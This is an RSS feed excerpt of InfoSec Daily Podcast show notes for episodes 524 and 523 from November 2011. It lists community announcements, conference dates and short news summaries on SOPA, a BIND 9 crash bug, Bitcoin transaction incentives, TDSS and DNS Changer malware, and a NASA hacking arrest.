		<description><![CDATA[InfoSec Daily Podcast Episode 524 for November 16, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 524 for November 16, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Marshall University (Huntington, West Virginia) is looking to hire a Assistant Professor-Information Assurance/Security. More info here: </span><a href="http://tinyurl.com/6lkh3o5"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">tinyurl.com/6lkh3o5</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (Search Number: 12709)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.eff.org/deeplinks/2011/11/public-shut-out-stop-online-piracy-act-hearings-again"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/deeplinks/2011/11/public-shut-out-stop-online-piracy-act-hearings-again</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This morning, EFF&rsquo;s staff and concerned netizens across the country tuned into the live webcast of the House Judiciary Committee&rsquo;s hearing on the Stop Online Piracy Act (H.R. 3261). At least we tried to. Unfortunately, we were confronted with an incredibly poor webcast stream for much of the hearing. We find it ironic and deeply concerning that Congress is unable to successfully stream video of an event this important to all Internet users, even as they are debating a dangerous plan to change the Internet in fundamental ways and deputize Internet intermediaries to act like content police.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many of the online watchers took to Twitter to voice their concerns about being shut out of the hearing by the poor quality webcast. But the Internet community was shut out of the hearing in a more fundamental way: of the six witnesses called to testify on Congress&rsquo; plan to heavily regulate the Internet, there was only one representative of the technology sector. &nbsp;As Public Knowledge&rsquo;s Martyn Griffen tweeted: &ldquo;#</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SOPA</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Hearing internet still fading in and out. It&#39;d be great if an internet engineer could fix the website issue in return for testifying.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We couldn&rsquo;t agree more. Congressman Lamar Smith&rsquo;s office noted the poor quality webcast, telling journalist Declan McCullagh: &quot;Our tech folks are trying to fix it, so please be patient.&quot; While the issue wasn&rsquo;t resolved in time for concerned citizens across the nation to watch the testimonies, it was restored in time for the questions and answers at the end.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recorded video from the hearing should be posted online in the next few hours. &nbsp;Once it&rsquo;s up, we&rsquo;ll post the link here and provide you with our analysis. In the meantime, we urge individuals concerned about the bill to contact their members of Congress today and take part in the American Censorship Day online actions.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.isc.org/software/bind/advisories/cve-2011-tbd"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.isc.org/software/bind/advisories/cve-2011-tbd</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An as-yet unidentified network event caused BIND 9 resolvers to cache an invalid record, subsequent queries for which could crash the resolvers with an assertion failure. ISC is working on determining the ultimate cause by which a record with this particular inconsistency is cached.At this time we are making available a patch which makes named recover gracefully from the inconsistency, preventing the abnormal exit.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The patch has two components. When a client query is handled, the code which processes the response to the client has to ask the cache for the records for the name that is being queried. The first component of the patch prevents the cache from returning the inconsistent data. The second component prevents named from crashing if it detects that it has been given an inconsistent answer of this nature.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CVSS Score: 7.8</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://coderrr.wordpress.com/2011/11/13/simplified-summary-of-microsoft-researchs-bitcoin-paper-on-incentivizing-transaction-propagation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://coderrr.wordpress.com/2011/11/13/simplified-summary-of-microsoft-researchs-bitcoin-paper-on-incentivizing-transaction-propagation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is a very simplified summary of the Microsoft Research paper &ldquo;On Bitcoin and Red Balloons&rdquo;. This summary is meant for people who already understand how the Bitcoin network and protocol function. For an overview of that see the Bitcoin Wikipedia page.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The flaw pointed out in the paper is that there is a negative incentive for miners to forward Bitcoin transactions. By not forwarding you increase the chance that you receive the transaction&rsquo;s fee rather than another miner. This is not so much of an issue now as the fees usually total to much less than the 50BTC reward per block. But as the block reward diminishes in the future this negative incentive may become more of an issue.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The paper&rsquo;s proposed solution is to reward nodes who forward transactions as well as nodes who solve the block in which the transaction is included. Each transaction would have a chain of its forwarding nodes attached to it. When a miner solves a block all nodes in the chains that lead the transactions in that block to the miner would be rewarded. The issue with this is that a single node can forward to itself many times to illegitimately gain more of the reward. This is called a Sybil attack.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Their solution to the Sybil attack is to give 0 reward to all nodes in a chain of forwards if the length of that chain is greater than H. This gives a negative incentive to create fake forwards to yourself in attempt to gain multiple rewards for a single transaction. Your best bet is to forward legitimately to other nodes and hope the transaction reaches a miner who solves it before the number of forwards is greater than H.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The paper determines optimal strategies in terms of values for H and the functions to divide the fee between nodes in the chain. But this is all modeled on directed trees (which have no cycles) rather than a random graph (which is what the Bitcoin network is like in reality) so it&rsquo;s unknown how well it would work in practice. They leave work on random graphs for future research.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2011/11/14/tdss_drops_dns_changer/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/11/14/tdss_drops_dns_changer/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the world&#39;s most advanced pieces of malware is being used to spread DNS Changer, a trojan at the heart of a massive click fraud scheme that has already hijacked 4 million PCs, security researchers said.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just a few days after federal prosecutors in the US shuttered the international conspiracy, researchers from Dell SecureWorks said they discovered DNS Changer is being spread by TDSS. The rootkit, as previously reported, is among the hardest to detect and remove and is often used as a means to install keyloggers, tools for attacking websites, and other malware.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once installed, DNS Changer is able to alter the DNS, or domain name system, settings that computers and routers use to find the IP numbers that correspond to domain names such as theregister.co.uk and google.com. By replacing legitimate DNS servers with servers under the control of the attackers, they are able to send victims to fraudulent websites instead of the destinations the victims intended to visit.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, seven people from Estonia and Russia were criminally charged in a scam that for more than five years used DNS Charger to generate more than $14 million in profit. They racked up the windfall by redirecting victims to imposter websites that paid advertising fees to the attackers each time they were clicked on. The scheme preyed on users of computers running Microsoft Windows and Apple OS X operating systems. DNS Changer is also able to change DNS configuration settings in certain routers, particularly when they use default usernames and passwords.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.klfy.com/story/16054152/romanian-arrested-for-hacking-into-nasas-servers"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.klfy.com/story/16054152/romanian-arrested-for-hacking-into-nasas-servers</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A court in Romania has ordered the arrest of a Romanian man accused of hacking into NASA&#39;s servers. &nbsp;Court spokesman Lucian Marian in the northwest city of Cluj says Robert Butyka would be arrested for 29 days as he awaits trial.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The 26-year-old Romanian national, currently in detention, is charged with breaching security measures to access several of NASA&#39;s servers in December 2010.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prosecutors said Wednesday that he interfered with server data, causing NASA losses of about $500,000 (euro371,000). There was no comment from the U.S. Embassy.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-524-deliberate-blundering-more-bind-lulz-shiesty-nodes-tdss-romanian-arrest/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3163/0/infosec-daily-podcast-episode-524.mp3" length="15752190" type="audio/mpeg" />
		<itunes:duration>0:32:46</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 524 for November 16, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Sm[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 524 for November 16, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Marshall University (Huntington, West Virginia) is looking to hire a Assistant Professor-Information Assurance/Security. More info here: tinyurl.com/6lkh3o5 (Search Number: 12709)
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.eff.org/deeplinks/2011/11/public-shut-out-stop-online-piracy-act-hearings-again
	This morning, EFF&#8217;s staff and concerned netizens across the country tuned into the live webcast of the House Judiciary Committee&#8217;s hearing on the Stop Online Piracy Act (H.R. 3261). At least we tried to. Unfortunately, we were confronted with an incredibly poor webcast stream for much of the hearing. We find it ironic and deeply concerning that Congress is unable to successfully stream video of an event this important to all Internet users, even as they are debating a dangerous plan to change the Internet in fundamental ways and deputize Internet intermediaries to act like content police.
	Many of the online watchers took to Twitter to voice their concerns about being shut out of the hearing by the poor quality webcast. But the Internet community was shut out of the hearing in a more fundamental way: of the six witnesses called to testify on Congress&#8217; plan to heavily regulate the Internet, there was only one representative of the technology sector. &#160;As Public Knowledge&#8217;s Martyn Griffen tweeted: &#8220;#SOPA Hearing internet still fading in and out. It&#39;d be great if an internet engineer could fix the website issue in return for testifying.&#8221;
	We couldn&#8217;t agree more. Congressman Lamar Smith&#8217;s office noted the poor quality webcast, telling journalist Declan McCullagh: &#34;Our tech folks are trying to fix it, so please be patient.&#34; While the issue wasn&#8217;t resolved in time for concerned citizens across the nation to watch the testimonies, it was restored in time for the questions and answers at the end.
	Recorded video from the hearing should be posted online in the next few hours. &#160;Once it&#8217;s up, we&#8217;ll post the link here and provide you with our analysis. In the meantime, we urge individuals concerned about the bill to contact their members of Congress today and take part in the American Censorship Day online actions.
	Source: https://www.isc.org/software/bind/advisories/cve-2011-tbd
	An as-yet unidentified network event caused BIND 9 resolvers to cache an invalid record, subsequent queries for which could crash the resolvers wit[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 523 &#8211; 747 Hacking, Canada Target?, Fed-strength Auth, Facebook Porn &amp; Opt-Out</title>
		<link>http://www.isdpodcast.com/episode-523-747-hacking-canada-target-fed-strength-auth-facebook-porn-opt-out</link>
		<comments>http://www.isdpodcast.com/episode-523-747-hacking-canada-target-fed-strength-auth-facebook-porn-opt-out#comments</comments>
		<pubDate>Wed, 16 Nov 2011 01:56:38 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3134</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 523 for November 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Keith Pachulski. Announcements: Caption Contest. Gives us your best and worst caption or PhotoShopped version: &#160; Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 523 for November 15, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Keith Pachulski.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Caption Contest. Gives us your best and worst caption or PhotoShopped version:<br />
	&nbsp;</span><img height="550px;" src="https://lh5.googleusercontent.com/hYa3e_0Om2MjMF25BySG5ipqEh_qwQ9gtos9LL-AMcKEixUg0tZGQ3-Zw1PojXnU9vvpeDttsLHHl8mUx53gu1A98-uAbuADCpqmQixbhdqBHIuNTZg" width="413px;" /></p>
<p>
	<img height="520px;" src="https://lh6.googleusercontent.com/tbMSNlrDqe0_BlnExD-rlmFX-xQZ4EPeIxFBd8iqNMh-tVXroZGmyiZGhDIXq_Fe9FNWo9Alr27pO3uq-3bEq_MtcAn4l6y8brGtIOBj5B6DnbCqVMA" width="409px;" /></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
